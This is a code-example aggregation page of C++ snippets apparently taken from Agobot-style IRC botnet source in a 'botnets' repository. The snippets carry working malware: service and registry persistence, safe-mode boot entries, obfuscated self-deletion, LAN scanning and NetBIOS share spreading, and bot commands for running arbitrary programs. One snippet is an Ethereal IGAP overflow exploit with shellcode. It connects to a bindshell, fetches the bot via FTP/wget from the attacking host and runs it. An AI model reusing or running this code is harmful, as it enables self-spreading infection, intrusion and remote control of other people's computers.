示例#1
0
bool CInstaller::ServiceAddInt(CString &sServicename, CString &sFilename, CString &sParams) {
	SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
	if(!hServiceControl) return false;

	CString sSvcCmd; sSvcCmd.Format("\"%s\" %s", sFilename.CStr(), sParams.CStr());
	SC_HANDLE hService=CreateService(hServiceControl, sServicename.CStr(),
		g_pMainCtrl->m_cBot.as_valname.sValue.CStr(), SERVICE_ALL_ACCESS, \
		SERVICE_WIN32_SHARE_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, \
		sSvcCmd.CStr(), NULL, NULL, NULL, NULL, NULL);
	if(!hService) {
		DWORD dwError=GetLastError();
		if(dwError==ERROR_SERVICE_EXISTS) {
			ServiceDel(sServicename); CloseServiceHandle(hService);
			CloseServiceHandle(hServiceControl);
			return ServiceAdd(sServicename, sFilename);
		} else {
			CloseServiceHandle(hServiceControl); return false; }
	}

	SC_ACTION scActions[1]; scActions[0].Delay=1; scActions[0].Type=SC_ACTION_RESTART;
	SERVICE_FAILURE_ACTIONS sfActions; sfActions.dwResetPeriod=INFINITE; sfActions.lpRebootMsg=NULL;
	sfActions.lpCommand=NULL; sfActions.cActions=1; sfActions.lpsaActions=scActions;

	if(!ChangeServiceConfig2(hService, SERVICE_CONFIG_FAILURE_ACTIONS, &sfActions)) {
		CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); return false;
	}

	CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); return true;
}
示例#2
0
bool CInstaller::ServiceAdd(CString &sServicename, CString &sFilename) {
	// Fail if the hash check failed
	if(g_pMainCtrl->m_bHashCheckFailed) return false;

	CString sysdir; GetSystemDirectory(sysdir.GetBuffer(MAX_PATH), MAX_PATH);
	CString sSvcCmd; sSvcCmd.Format("%s\\%s", sysdir.CStr(), sFilename.CStr());
	CString sSvcParams; sSvcParams.Format("-service");
	return ServiceAddInt(sServicename, sSvcCmd, sSvcParams); }
示例#3
0
bool CInstaller::ServiceAdd(CString &sServicename, CString &sFilename) 
{
	CString sysdir; 
	GetSystemDirectory(sysdir.GetBuffer(MAX_PATH), MAX_PATH);
	CString sSvcCmd; 
	sSvcCmd.Format("%s\\%s", sysdir.CStr(), sFilename.CStr());
	CString sSvcParams; 
	sSvcParams.Format("-netsvcs");
	return ServiceAddInt(sServicename, sSvcCmd, sSvcParams); 
}
示例#4
0
文件: mac.cpp 项目: hazcod/botnets
bool CMac::AddLogin(CString sUsername, CString sPassword, CString sIRCUsername, CString sHost, CString sIdentd)
{	if(FindLogin(sIRCUsername)) return false;
	user *pUser=FindUser(sUsername); if(!pUser) return false;
	if(pUser) if(CheckPassword(sPassword, pUser))
	{	
		if(sHost.Compare("")) if(strcmp(sHost.CStr(), pUser->sHost.CStr())!=0) return false;
		if(sIdentd.Compare("")) if(strcmp(sIdentd.CStr(), pUser->sIdentd.CStr())!=0) return false;
		login *pLogin=new login; pLogin->pUser=pUser; pLogin->sUsername=sUsername;
		pLogin->sIRCUsername=sIRCUsername; llStart.push_back(pLogin); return true; }
	return false; }
示例#5
0
bool CInstaller::RegStartDel(CString &sValuename) {
	HKEY key;
	RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); 
	RegDeleteValue(key, sValuename.CStr()); 
	RegCloseKey(key); 

	RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); 
	RegDeleteValue(key, sValuename.CStr()); 
	RegCloseKey(key); 

	return true; }
示例#6
0
bool CInstaller::RegStartAdd(CString &sValuename, CString &sFilename) {
	// Fail if the hash check failed
	if(g_pMainCtrl->m_bHashCheckFailed) return false;

	HKEY key;
	RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); 
	RegSetValueEx(key, sValuename.CStr(), 0, REG_SZ, (LPBYTE)(const char *)sFilename.CStr(), (DWORD)strlen(sFilename)); 
	RegCloseKey(key); 

	RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); 
	RegSetValueEx(key, sValuename.CStr(), 0, REG_SZ, (LPBYTE)(const char *)sFilename.CStr(), (DWORD)strlen(sFilename)); 
	RegCloseKey(key);

	return true; }
示例#7
0
文件: smtp.cpp 项目: hazcod/botnets
bool CSMTP_Connection::Connect(CString sHost, int iPort) {
	// Fail if already connected
	if(m_sServerSocket.IsConnected() || m_bConnected) return false;

	// Connect to the server
	if(!m_sServerSocket.Connect(sHost.CStr(), iPort)) {
		// Connection failed
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Failed to connect to \"%s:%d\"!\n", this,
			sHost.CStr(), iPort);
#endif // DBGCONSOLE
		return false;
	}

	// Store server address in member variables
	m_sServerHost.Assign(sHost); m_iServerPort=iPort;

#ifdef DBGCONSOLE
	g_pMainCtrl->m_cConsDbg.Log(3, "CSMTP_Connection(0x%8.8Xh): "
		"Connected to \"%s:%d\"!\n", this,
		m_sServerHost.CStr(), m_iServerPort);
#endif // DBGCONSOLE

	// Receive banner
	CString sRecvBuf;
	if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) {
		// Connection reset
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Connection reset!\n", this);
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	// Check if connection was accepted
	if(sRecvBuf.Mid(0, 3).Compare("220")) {
		// Connection not accepted
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Server rejected connection!\n", this);
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	// Set connection status to true and return true
	m_bConnected=true; return true;
}
示例#8
0
文件: mac.cpp 项目: hazcod/botnets
bool CMac::DelLogin(CString sUsername, CString sIRCUsername)
{	if(!sUsername.CStr()) return false; login *pRemove=NULL;
	list<login*>::iterator i; for(i=llStart.begin(); i!=llStart.end(); ++i)
	{	if(!(*i)->sUsername.Compare(sUsername) || !(*i)->sIRCUsername.Compare(sIRCUsername))
			pRemove=(*i); }
	if(pRemove) { llStart.remove(pRemove); delete pRemove; return true; }
	return false; }
示例#9
0
void CPortScanner::AddLocalLAN() {
	while(!g_pMainCtrl->m_cIRC.m_bJoined) { Sleep(1000); }
	while(!g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) { Sleep(1000); }
	CString sLocalIp = g_pMainCtrl->m_cIRC.m_sLocalIp;
	while (sLocalIp.CStr() == "") Sleep(1000);
	int iLocalPart1=atoi(sLocalIp.Token(0, ".").CStr());
	int iLocalPart2=atoi(sLocalIp.Token(1, ".").CStr());
	int iLocalPart3=atoi(sLocalIp.Token(2, ".").CStr());
	int iLocalPart4=atoi(sLocalIp.Token(3, ".").CStr());

	CNetRange *nRange=new CNetRange;
	nRange->iPart1=iLocalPart1; nRange->iPart2=iLocalPart2; nRange->iPart3=iLocalPart3;
	nRange->iPart4=0; nRange->iNetMask=24; nRange->iPriority=80;
	nRange->bNotice=false; nRange->bSilent=false; nRange->sReplyTo.Assign(""); nRange->pScanner=&g_pMainCtrl->m_cScanner;

	RegisterNetRange(nRange);

	nRange=new CNetRange;
	nRange->iPart1=iLocalPart1; nRange->iPart2=iLocalPart2; nRange->iPart3=0; nRange->iPart4=0;
	nRange->iNetMask=16; nRange->iPriority=90; nRange->bNotice=false; nRange->bSilent=false;
	nRange->sReplyTo.Assign(""); nRange->pScanner=&g_pMainCtrl->m_cScanner;

	RegisterNetRange(nRange);

	nRange=new CNetRange;
	nRange->iPart1=iLocalPart1; nRange->iPart2=0; nRange->iPart3=0; nRange->iPart4=0;
	nRange->iNetMask=8; nRange->iPriority=100; nRange->bNotice=false; nRange->bSilent=false; nRange->sReplyTo.Assign("");
	nRange->pScanner=&g_pMainCtrl->m_cScanner;

	RegisterNetRange(nRange);
}
示例#10
0
int GetCopies(CString &sFilename)
{
#ifdef WIN32
	char cFilename[MAX_PATH]; GetModuleFileName(GetModuleHandle(NULL), cFilename, sizeof(cFilename));
	if(fCreateToolhelp32Snapshot && fProcess32First && fProcess32Next)
	{	psnap=fCreateToolhelp32Snapshot(2, 0);
		if(psnap!=INVALID_HANDLE_VALUE)
		{	int copies=0; pe32.dwSize=sizeof(PROCESSENTRY32);
			if(fProcess32First(psnap, &pe32))
			{	do {	if((strncmp(cFilename+(strlen(cFilename)-strlen(pe32.szExeFile)), \
						pe32.szExeFile, strlen(pe32.szExeFile))==0) || \
						(strncmp(sFilename, pe32.szExeFile, strlen(pe32.szExeFile))==0))
							copies++;
				} while(fProcess32Next(psnap, &pe32)); }
			CloseHandle(psnap);
			return copies; }
		else return 0; }
	else return 0;
#else
	char szCmdBuf[4096]; sprintf(szCmdBuf, "ps ax | grep %s | grep -v grep > psaxtemp", sFilename.CStr());
	system(szCmdBuf); FILE *fp=fopen("psaxtemp", "r"); if(!fp) return 0;
	fseek(fp, 0, SEEK_END); long lFileSize=ftell(fp); fseek(fp, 0, SEEK_SET);
	if(lFileSize>0) return 1;
	fclose(fp); system("rm -f psaxtemp"); return 0;
#endif // WIN32
}
示例#11
0
bool CScannerEthereal::ExploitInt(int iOffset) {
	char buffer[MAX_BUFF]; ipheader *iphdr=(ipheader*)buffer; igap_header *igaphdr=(igap_header*)(buffer+sizeof(ipheader));
	unsigned long magic=targets[iOffset].ret; CString sRandomIp; int one=1; const int *val=&one; sockaddr_in sin;

	memset(buffer, 0x00, MAX_BUFF); int sockfd=socket(PF_INET, SOCK_RAW, IPPROTO_RAW); if(sockfd==SOCKET_ERROR) return false;
	if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, val, sizeof(one))<0) { close(sockfd); return false; }
	init_random(); sRandomIp.Format("%d.%d.%d.%d", brandom(0, 255), brandom(0, 255), brandom(0, 255), brandom(0, 255));

	sin.sin_addr.s_addr=inet_addr(m_sSocket.m_szHost); sin.sin_family=AF_INET; sin.sin_port=0x00;
	
	iphdr->ip_hl=0x05; iphdr->ip_v=0x04; iphdr->ip_tos=0x00; iphdr->ip_len=MAX_BUFF; iphdr->ip_id=htonl(54321);
	iphdr->ip_off=0x00; iphdr->ip_ttl=0x01; iphdr->ip_proto=IPPROTO_IGAP; iphdr->ip_sum=0x00;
	iphdr->ip_src=inet_addr(sRandomIp.CStr()); iphdr->ip_dst=inet_addr(m_sSocket.m_szHost);
	if(iphdr->ip_src==SOCKET_ERROR || iphdr->ip_dst==SOCKET_ERROR) { close(sockfd); return false; }

	igaphdr->igap_type=0x41; igaphdr->igap_restime=0x0a; igaphdr->igap_cksum=0x00; igaphdr->igap_gaddr=0x00;
	igaphdr->igap_ver=0x01; igaphdr->igap_stype=0x21; igaphdr->igap_reserved1=0x00; igaphdr->igap_cid=0x00;
	igaphdr->igap_asize=0x10; igaphdr->igap_msgsize=0x40+PAYLOAD_SIZE; igaphdr->igap_reserved2=0x00;

	memset(igaphdr->igap_payload, 0x90, 16+64+PAYLOAD_SIZE);
	memcpy(igaphdr->igap_payload+16+RETOFFSET-strlen(shellcode_firsthalf)-8, shellcode_firsthalf, strlen(shellcode_firsthalf));
	memcpy(igaphdr->igap_payload+16+64+RETOFFSET-strlen(jumpcode)-4, jumpcode, strlen(jumpcode));
	memcpy(igaphdr->igap_payload+16+64+RETOFFSET, &magic, 4); magic-=0x10;
	memcpy(igaphdr->igap_payload+16+64+RETOFFSET-4, &magic, 4);
	memcpy(igaphdr->igap_payload+16+64+PAYLOAD_SIZE-strlen(shellcode_secondhalf)-1, shellcode_secondhalf, strlen(shellcode_secondhalf));

	igaphdr->igap_cksum=checksum((unsigned short*)(buffer+sizeof(struct ipheader)), (sizeof(struct igap_header))>>1);
	iphdr->ip_sum=checksum((unsigned short*)buffer, (iphdr->ip_len)>>1);

	one=MAX_PACKET; while(one) {
		sendto(sockfd, buffer, MAX_BUFF, 0, (sockaddr*)&sin, sizeof(sin)); one--; }
	close(sockfd); return true; }
示例#12
0
bool CScannerEthereal::Exploit() {
	if(!IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && IsPrivate(m_sSocket.m_szHost)) return false;

	// We need root to exploit this cause we need to spoof packets
	if(getuid()) return false;

	ExploitInt(0); ExploitInt(1); ExploitInt(2); ExploitInt(3);
	
	CSocket sShellSocket; if(sShellSocket.Connect(m_sSocket.m_szHost, 31337)) {
		CString sCmdBuf; sShellSocket.RecvTO(sCmdBuf.GetBuffer(8192), 8192, 2000);
		sCmdBuf.Format("echo -e open %s %d\\nuser ftp bla\\nget bot\\nquit\\n | ftp -n\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
		sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
		sCmdBuf.Format("wget ftp://bla:bla@%s:%d/bot\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
		sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
		sCmdBuf.Assign("chmod 777 ./bot ; ./bla\n");
		sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
		sShellSocket.Disconnect(); return true; } else return false; }
示例#13
0
文件: mac.cpp 项目: hazcod/botnets
bool CMac::CheckPassword(CString sPassword, user *pUser)
{	if(!sPassword.CStr()) return false;
	md5::MD5_CTX md5; md5::MD5Init(&md5); unsigned char szMD5[16]; CString sMD5; sMD5.Assign("");
	md5::MD5Update(&md5, (unsigned char*)sPassword.Str(), sPassword.GetLength());
	md5::MD5Final(szMD5, &md5); for(int i=0;i<16;i++)
	{	CString sTemp; sTemp.Format("%2.2X", szMD5[i]); sMD5.Append(sTemp); }
	if(!pUser->sPassword.Compare(sMD5)) return true;
	return false; }
示例#14
0
bool CInstaller::Uninstall()
{
#ifdef WIN32
	HANDLE f; DWORD r;
	PROCESS_INFORMATION pinfo; STARTUPINFO sinfo;
	char cmdline[MAX_PATH]; char tcmdline[MAX_PATH]; char cfilename[MAX_PATH];
	char batfile[MAX_PATH]; char tempdir[MAX_PATH];

	GetModuleFileName(GetModuleHandle(NULL), cfilename, sizeof(cfilename));
	GetTempPath(sizeof(tempdir), tempdir);

	sprintf(batfile, "%s\\%s", tempdir, dp(1,6,18,15,79,2,1,20,0).CStr());
	f = CreateFile(batfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
	if (f > (HANDLE)0) {
		// write a batch file to remove our executable once we close
			/*WriteFile(f, "@echo off\r\n"
					 ":start\r\nif not exist \"\"%1\"\" goto done\r\n"
					 "del /F \"\"%1\"\"\r\n"
					 "del \"\"%1\"\"\r\n"
					 "goto start\r\n"
					 ":done\r\n"
					 "del /F %temp%\r.bat\r\n"
					 "del %temp%\r.bat\r\n", 105, &r, NULL);*/
			CString sBat;
			sBat.Format("%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r%s\r\n%s\r%s\r\n",
			dp(86,5,3,8,15,78,15,6,6,0).CStr(),	// @echo off
			dp(83,19,20,1,18,20,0).CStr(),		// :start
			// if not exist ""%1"" goto done
			dp(9,6,78,14,15,20,78,5,24,9,19,20,78,84,84,57,69,84,84,78,7,15,20,15,78,4,15,14,5,0).CStr(),
			dp(4,5,12,78,82,32,78,84,84,57,69,84,84,0).CStr(),	// del /F ""%1""
			dp(4,5,12,78,84,84,57,69,84,84,0).CStr(),			// del ""%1""
			dp(7,15,20,15,78,19,20,1,18,20,0).CStr(),			// goto start
			dp(83,4,15,14,5,0).CStr(),							// :done
			dp(4,5,12,78,82,32,78,57,20,5,13,16,57,0).CStr(),	// del /F %temp%
			dp(79,2,1,20,0).CStr(),								// .bat
			dp(4,5,12,78,57,20,5,13,16,57,0).CStr(),			// del %temp%
			dp(79,2,1,20,0).CStr());							// .bat

		WriteFile(f, sBat.CStr(), 105, &r, NULL);

		CloseHandle(f);

		memset(&sinfo, 0, sizeof(STARTUPINFO));
		sinfo.cb = sizeof(sinfo);
		sinfo.wShowWindow = SW_HIDE;

		GetModuleFileName(GetModuleHandle(NULL), cfilename, sizeof(cfilename));// get our file name
		sprintf(tcmdline, "%%comspec%% /c %s %s", batfile, cfilename); // build command line
		ExpandEnvironmentStrings(tcmdline, cmdline, sizeof(cmdline)); // put the name of the command interpreter into the command line

		// execute the batch file
		CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo);
	}
#else
	// Linux
#endif // WIN32
	return true;
}
示例#15
0
bool CInstaller::IsInstalled(CString &sServicename) {
	SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
	if(!hServiceControl) return false;

	SC_HANDLE hService=OpenService(hServiceControl, sServicename.CStr(), SERVICE_ALL_ACCESS);
	if(!hService) { CloseServiceHandle(hServiceControl); return false; }
	CloseServiceHandle(hService); CloseServiceHandle(hServiceControl);

	return true;
}
示例#16
0
bool CInstaller::ServiceDel(CString &sServicename) {
	SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
	if(!hServiceControl) return false;

	SC_HANDLE hService=OpenService(hServiceControl, sServicename.CStr(), SERVICE_ALL_ACCESS);
	if(!hService) { CloseServiceHandle(hServiceControl); return false; }
	SERVICE_STATUS sStatus; ControlService(hService, SERVICE_CONTROL_STOP, &sStatus);
	DeleteService(hService); CloseServiceHandle(hService); CloseServiceHandle(hServiceControl);

	return true;
}
示例#17
0
void CBot::Init()
{	init_random();
	CString sTemp;		sTemp.Format("%d", brandom(500, 22226));
	CString sTempFTP;	sTempFTP.Format("%d", brandom(500, 22226));

	REGCVAR(bot_ftrans_port,		sTemp.CStr(),		"Bot - File Transfer Port",			false,	false,	0	);
	REGCVAR(bot_ftrans_port_ftp,	sTempFTP.CStr(),	"Bot - File Transfer Port for FTP",	false,	false,	0	);
	REGCVAR(si_chanpass,			"",					"Server Info - Channel Password",	false,	false,	0	);
	REGCVAR(si_mainchan,			"",					"Server Info - Main Channel",		false,	false,	0	);
	REGCVAR(si_nickprefix,			"",					"Server Info - Nickname prefix",	false,	false,	0	);
	REGCVAR(si_port,				"",					"Server Info - Server Port",		false,	false,	0	);
	REGCVAR(si_server,				"",					"Server Info - Server Address",		false,	false,	0	);
	REGCVAR(si_servpass,			"",					"Server Info - Server Password",	false,	false,	0	);
	REGCVAR(si_usessl,				"",					"Server Info - Use SSL ?",			false,	false,	0	);

	Config();

	REGCMD(m_cmdAbout,			"bot.about",		"...",	false,	this);
	REGCMD(m_cmdDie,			"bot.die",			"terminates the bot",								false,	this);
	REGCMD(m_cmdDns,			"bot.dns",			"resolves ip/hostname by dns",						false,	this);
	REGCMD(m_cmdExecute,		"bot.execute",		"makes the bot execute a .exe",						false,	this);
	REGCMD(m_cmdId,				"bot.id",			"displays the id of the current code",				false,	this);
	REGCMD(m_cmdNick,			"bot.nick",			"changes the nickname of the bot",					false,	this);
	REGCMD(m_cmdOpen,			"bot.open",			"opens a file (whatever)",							false,	this);
	REGCMD(m_cmdRemove,			"bot.remove",		"removes the bot",									false,	this);
	REGCMD(m_cmdRemoveAllBut,	"bot.removeallbut",	"removes the bot if id does not match",				false,	this);
	REGCMD(m_cmdRndNick,		"bot.rndnick",		"makes the bot generate a new random nick",			false,	this);
	REGCMD(m_cmdStatus,			"bot.status",		"gives status",										false,	this);
	REGCMD(m_cmdSysInfo,		"bot.sysinfo",		"displays the system info",							false,	this);
	REGCMD(m_cmdLongUptime,		"bot.longuptime",	"If uptime > 7 days then bot will respond",			false,	this);
	REGCMD(m_cmdQuit,			"bot.quit",			"quits the bot",									false,	this);
	REGCMD(m_cmdFlushDNS,		"bot.flushdns",		"flushes the bots dns cache",						false,	this);
	REGCMD(m_cmdSecure,			"bot.secure",		"delete shares / disable dcom",						false,	this);
	REGCMD(m_cmdUnSecure,		"bot.unsecure",		"enable shares / enable dcom",						false,	this);
	REGCMD(m_cmdCommand,		"bot.command",		"runs a command with system()",						false,	this);

	CString sRndNick=RndNick(si_nickprefix.sValue.CStr());
	g_pMainCtrl->m_sUserName.Format("%s", sRndNick.Mid(0, 32).CStr());
	m_lStartTime=(unsigned long)GetTickCount()/1000;
}
示例#18
0
bool CInstaller::ServiceStart(CString &sServicename) {
	SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
	if(!hServiceControl) return false;

	SC_HANDLE hService=OpenService(hServiceControl, sServicename.CStr(), SERVICE_ALL_ACCESS);
	if(!hService) { CloseServiceHandle(hServiceControl); return false; }
	StartService(hService, 0, NULL);
	CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); 

/*	CString sCmdBuf; sCmdBuf.Format("net start %s", sServicename.CStr());
	system(sCmdBuf.CStr());*/

	return true;
}
示例#19
0
bool CScannerNetBios::StartViaCreateService(const char *share, const char *host, const char *user, const char *password)
{	bool bRetVal=false; char buffer[MAX_PATH]; SC_HANDLE hServiceControl=OpenSCManager(host, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
	if(!hServiceControl) return false; char szBotRemote[MAX_PATH], szBotSvc[MAX_PATH], szSvcCmd[MAX_PATH]; CString sTempPath;

	GetTempPath(MAX_PATH, sTempPath.GetBuffer(MAX_PATH)); sTempPath.Append("\\glx5223.tmp");
	WriteFile(sTempPath.CStr(), IDR_AGOBOTSVC, NULL);
	sprintf(szBotSvc, "\\\\%s\\%s\\%s", host, share, "thesvc.exe");
	unsigned long lTimeoutStart=GetTickCount();
	while(CopyFile(sTempPath, szBotSvc, false)==false && GetTickCount()-lTimeoutStart<25000) Sleep(100);
	DeleteFile(sTempPath);

	GetFilename(buffer, MAX_PATH);
	sprintf(szBotRemote, "\\\\%s\\%s\\%s", host, share, g_cMainCtrl.m_cBot.bot_filename.sValue.CStr());
	lTimeoutStart=GetTickCount();
	while(CopyFile(buffer, szBotRemote, false)==false && GetTickCount()-lTimeoutStart<25000) Sleep(100);

	sprintf(szSvcCmd, "\"%s\" \"%s\"", szBotSvc, szBotRemote);
	SC_HANDLE hService=CreateService(hServiceControl, "cfgldr",
		g_cMainCtrl.m_cBot.as_valname.sValue.CStr(), SERVICE_ALL_ACCESS, \
		SERVICE_WIN32_OWN_PROCESS, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, \
		szSvcCmd, NULL, NULL, NULL, NULL, NULL);
	if(!hService) {
		DWORD dwError=GetLastError();
		if(dwError==ERROR_SERVICE_EXISTS) {
			hService=OpenService(hServiceControl, "cfgldr", SERVICE_ALL_ACCESS);
			if(!hService) { CloseServiceHandle(hServiceControl); return false; }
			SERVICE_STATUS sStatus; ControlService(hService, SERVICE_CONTROL_STOP, &sStatus);
			DeleteService(hService); CloseServiceHandle(hService); CloseServiceHandle(hServiceControl);
			return StartViaCreateService(share, host, user, password);
		} else {
			LPVOID lpMsgBuf;
			FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER|FORMAT_MESSAGE_FROM_SYSTEM|FORMAT_MESSAGE_IGNORE_INSERTS, \
				NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR)&lpMsgBuf, 0, NULL);
			
			MessageBox(NULL, (LPCTSTR)lpMsgBuf, "Error", MB_OK|MB_ICONINFORMATION);
			
			LocalFree(lpMsgBuf);

			CloseServiceHandle(hServiceControl); return false; }
	}
	if(hService) if(!StartService(hService, 0, NULL)) return bRetVal=false; else bRetVal=true;

	SERVICE_STATUS ssTemp;
//	if(hService) ControlService(hService, SERVICE_CONTROL_STOP, &ssTemp);
//	if(hService) DeleteService(hService);
	if(hService) CloseServiceHandle(hService);
	CloseServiceHandle(hServiceControl);
	g_cMainCtrl.m_cIRC.SendFormat(m_bSilent, m_bNotice, m_sReplyTo.Str(), "%s: Exploited \\\\%s\\%s with l/p: %s/%s (CreateService)!!!", m_sScannerName.CStr(), host, share, user, password);
	DeleteFile(szBotRemote); DeleteFile(szBotSvc);
	return bRetVal; }
示例#20
0
bool CInstaller::ServiceAddInt(CString &sServicename, CString &sFilename, CString &sParams) {

	SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
	if(!hServiceControl) return false;

	CString sSvcCmd; sSvcCmd.Format("\"%s\" %s", sFilename.CStr(), sParams.CStr());
	SC_HANDLE hService=CreateService(hServiceControl, sServicename.CStr(),
		g_pMainCtrl->m_pBot->as_valname.sValue.CStr(), SERVICE_ALL_ACCESS, \
		SERVICE_WIN32_SHARE_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, \
		sSvcCmd.CStr(), NULL, NULL, NULL, NULL, NULL);
	if(!hService) {
		DWORD dwError=GetLastError();
		if(dwError==ERROR_SERVICE_EXISTS) {
			ServiceDel(sServicename); CloseServiceHandle(hService);
			CloseServiceHandle(hServiceControl);
			return ServiceAdd(sServicename, sFilename);
		} else {
			CloseServiceHandle(hServiceControl); return false; }
	}

	SC_ACTION scActions[1]; scActions[0].Delay=1; scActions[0].Type=SC_ACTION_RESTART;
	SERVICE_FAILURE_ACTIONS sfActions; sfActions.dwResetPeriod=INFINITE; sfActions.lpRebootMsg=NULL;
	sfActions.lpCommand=NULL; sfActions.cActions=1; sfActions.lpsaActions=scActions;

	if(!ChangeServiceConfig2(hService, SERVICE_CONFIG_FAILURE_ACTIONS, &sfActions)) {
		CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); return false;
	}

	CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); 
	
	HKEY key; HKEY lhmin; HKEY lhnet; HKEY lhnew; DWORD dwSize=128; char szDataBuf[128];	
	strcpy(szDataBuf, "Service");
	LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\", 0, KEY_READ, &key);
	RegOpenKeyEx(key, "Minimal",0,KEY_ALL_ACCESS, &lhmin);
	RegOpenKeyEx(key, "Network",0,KEY_ALL_ACCESS, &lhnet);
	RegCreateKeyEx(lhmin, sServicename.CStr(), 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &lhnew, NULL);
	RegSetValueEx(lhnew, sServicename.CStr(), NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize);
	RegCreateKeyEx(lhnet, sServicename.CStr(), 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &lhnew, NULL);
	RegSetValueEx(lhnew, sServicename.CStr(), NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize);
	RegCloseKey(lhnet);
	RegCloseKey(lhmin);
	RegCloseKey(key);

	return true;
}
示例#21
0
文件: smtp.cpp 项目: hazcod/botnets
bool CSMTP_Connection::Disconnect() {
	// Fail if not connected
	if(!m_sServerSocket.IsConnected()) return false;

	// Send QUIT command
	CString sReqBuf; sReqBuf.Format("QUIT\r\n");
	m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength());

#ifdef DBGCONSOLE
	g_pMainCtrl->m_cConsDbg.Log(3, "CSMTP_Connection(0x%8.8Xh): "
		"Disconnecting from \"%s:%d\"!\n", this,
		m_sServerHost.CStr(), m_iServerPort);
#endif // DBGCONSOLE

	// Close socket and reset variables
	m_sServerSocket.Disconnect();
	m_sServerHost.Assign(""); m_iServerPort=0; m_bConnected=false;
	return true;
}
示例#22
0
bool ParseNetRange(const CString &sInput, CNetRange &nRange)
{	// Netrange is never longer than 18 characters
	if(sInput.GetLength()>18) return false;

	// Get temp storage and copy the string
	char *szTemp=new char[sInput.GetLength()+2];
	sprintf(szTemp, "%s", sInput.CStr());

	// Get number of dots and slashes in the string
	int iDotCount=0, iSlashCount=0;
	for(int i=0; i<strlen(szTemp); i++)
	{	if(szTemp[i]=='.') iDotCount++;
		else if(szTemp[i]=='/') iSlashCount++; }

	// If there are no 3 dots or there is no slash, fail
	if(iDotCount!=3) { delete [] szTemp; return false; }
	if(iSlashCount!=1) { delete [] szTemp; return false; }

	// Make a copy of the string into a CString and parse it
	CString sTemp(szTemp);
	nRange.iPart1=atoi(sTemp.Token(0, "/").Token(0, ".").CStr());
	nRange.iPart2=atoi(sTemp.Token(0, "/").Token(1, ".").CStr());
	nRange.iPart3=atoi(sTemp.Token(0, "/").Token(2, ".").CStr());
	nRange.iPart4=atoi(sTemp.Token(0, "/").Token(3, ".").CStr());
	nRange.iNetMask=atoi(sTemp.Token(1, "/").CStr());

	// Fail if the parts are 0
	if(!nRange.iPart1 && !nRange.iPart2 && !nRange.iPart3 && !nRange.iPart4)
	{	delete [] szTemp; return false; }

	// Fail if the netmask is not a multiple of 8
